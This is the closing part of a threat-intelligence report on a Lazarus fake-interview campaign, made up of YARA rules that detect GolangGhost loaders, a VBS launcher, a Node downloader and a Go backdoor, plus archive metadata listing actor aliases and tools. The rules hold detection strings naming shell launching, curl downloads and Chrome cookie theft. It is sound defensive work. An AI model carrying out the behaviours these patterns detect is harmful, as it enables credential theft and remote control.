intrusion_set = \"Lazarus\"\r\nmalware = \"GolangGhost\"\r\n description = \"Detects ReactJS code used in ClickFake campaign\"\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 14 of 16\n\nsource = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"d583a05680e83b5b4c7ac2d21920384b\"\r\n strings:\r\n $ = \"/invite/${\"\r\n $ = \"inviteUUID\" nocase\r\n $ = \"The content is copied to the clipboard\"\r\n $ = \"react.element\"\r\n $ = \"Interview\" nocase\r\n condition:\r\n all of them and filesize \u003c 5MB\r\n}\r\nrule apt_Lazarus_ClickFake_ZIP_with_GolangGhost {\r\n meta:\r\n id = \"2cfea7bc-ea80-4bf7-b647-364e01a631ff\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\nmalware = \"GolangGhost\"\r\n description = \"Detects Lazarus's ZIP file with Go Stealer\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"00b7488d87972e9812e94c69385f6839\"\r\n strings:\r\n $ = { (9A 18| 84 17) 00 00 [4-12] 2F 63 68 72 6F 6D 65 5F 63 6F 6F 6B 69 65 5F 64 61 72 77 69 6E 2E 67 6F}\r\n $ = { (BF 05 | 36 06) 00 00 [4-12] 2F 62 61 73 69 63 2E 67 }\r\n $ = { (08 24 | 95 22 ) 00 00 [4-12] 2F 63 68 72 6F 6D 65 5F 63 6F 6F 6B 69 65 5F 6F 74 68 65 72 2E 67 6F }\r\n condition:\r\n uint32be(0) == 0x504b0304 and\r\n 1 of them\r\n}\r\nrule apt_Lazarus_ClickFake_NodeVBS_Launcher {\r\n meta:\r\n id = \"7c869b72-21ff-463c-b12e-cbd629ca8cc6\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\n malware = \"GolangGhost\"\r\n description = \"Detects Node VBS launcher used in the ClickFake campaign\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"ce37c75d35c82f933e14b00f32c25373\"\r\n strings:\r\n $s = \"objShell.Run \\\"cmd /c node \"\r\n condition:\r\n uint32be(0) == 0x53657420 and\r\n $s in (filesize-50..filesize)\r\n }\r\nrule apt_Lazarus_ClickFake_Go_Backdoor_strings {\r\n meta:\r\n id = \"77f85517-2446-4251-a684-10888312f190\"\r\n version = \"1.0\"\r\nmalware = \"GolangGhost\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detect's Lazarus Go interpreted Backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"341ba2e57a0f108be75a1515d32a008a\"\r\n strings:\r\n $ = \"func processInfo(\"\r\n $ = \"func processUpload(\"\r\n $ = \"func processWait(\"\r\n $ = \"func processOsShell(\"\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 15 of 16\n\n$ = \"func StartMainLoop(\"\r\n condition:\r\n uint32be(0) == 0x7061636b and\r\n 3 of them\r\n}\r\nrule apt_Lazarus_ClickFake_GolangGhost_Compiled {\r\n meta:\r\n id = \"f0d1d82e-7cb5-4324-8f11-310d0dc26e48\"\r\n version = \"1.0\"\r\nmalware = \"GolangGhost\"\r\n intrusion_set = \"Lazarus\"\r\n description = \"Detects Lazarus compiled Go Backdoor\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n strings:\r\n $ = \"bits-project/bits/util\"\r\n $ = \"unknown auto mode\"\r\n $ = \"%s.tar.gz\"\r\n $ = \"AutoModeChromeGather\"\r\n $ = \"UUID: %s, URL: %s\"\r\n condition:\r\n (\r\n(uint16(0) == 0x5a4d) or\r\n(uint32(0)==0x464c457f) or\r\n(uint32(0) == 0xfeedfacf) or\r\n(uint32(0) == 0xcffaedfe) or\r\n(uint32(0) == 0xfeedface) or\r\n(uint32(0) == 0xcefaedfe)\r\n) and 4 of them\r\n}\r\nrule apt_Lazarus_ClickFake_NodeJS_Downloader {\r\n meta:\r\n id = \"c74b47ef-7105-4382-b4af-80652ad4047d\"\r\n version = \"1.0\"\r\n intrusion_set = \"Lazarus\"\r\nmalware = \"GolangGhost\"\r\n description = \"Detects the NodeJS Downloader\"\r\n source = \"Sekoia.io\"\r\n creation_date = \"2025-03-20\"\r\n classification = \"TLP:GREEN\"\r\n hash = \"7978d40bd5ca56021f6c250f564e7e27\"\r\n strings:\r\n $ = \"spawn('tar', ['-xf\"\r\n $ = \"/t', 'REG_SZ\"\r\n $ = \"curl/\"\r\n condition:\r\n uint32be(0) == 0x636f6e73 and\r\n filesize \u003c 10KB and\r\n all of them\r\n}\r\nAPT ClickFake Interview ClickFix Contagious Interview CTI FrestoFerret GolangGhost\r\nLazarus\r\nShare this post:\r\nSource: https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nhttps://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/\r\nPage 16 of 16", "extraction_quality": 1, "language": "EN", "sources": [ "MITRE", "ETDA", "Malpedia" ], "references": [ "https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/" ], "report_names": [ "clickfake-interview-campaign-by-lazarus" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "c1eadfd8-6e9c-4024-902d-555c9530fcea", "created_at": "2023-01-06T13:46:38.645834Z", "updated_at": "2026-04-10T02:00:03.04985Z", "deleted_at": null, "main_name": "TEMP.Hermit", "aliases": [], "source_name": "MISPGALAXY:TEMP.Hermit", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "1bdb91cf-f1a6-4bed-8cfa-c7ea1b635ebd", "created_at": "2022-10-25T16:07:23.766784Z", "updated_at": "2026-04-10T02:00:04.7432Z", "deleted_at": null, "main_name": "Bluenoroff", "aliases": [ "APT 38", "ATK 117", "Alluring Pisces", "Black Alicanto", "Bluenoroff", "CTG-6459", "Copernicium", "G0082", "Nickel Gladstone", "Sapphire Sleet", "Selective Pisces", "Stardust Chollima", "T-APT-15", "TA444", "TAG-71", "TEMP.Hermit" ], "source_name": "ETDA:Bluenoroff", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", "ZetaNile", "concealment_troy", "http_troy", "httpdr0pper", "httpdropper", "klovbot", "sRDI" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434616, "ts_updated_at": 1775792300, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.pdf", "text": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.txt", "img": "https://archive.orkl.eu/ee014dd867eed637d08c84509af57fe141d58c21.jpg" } }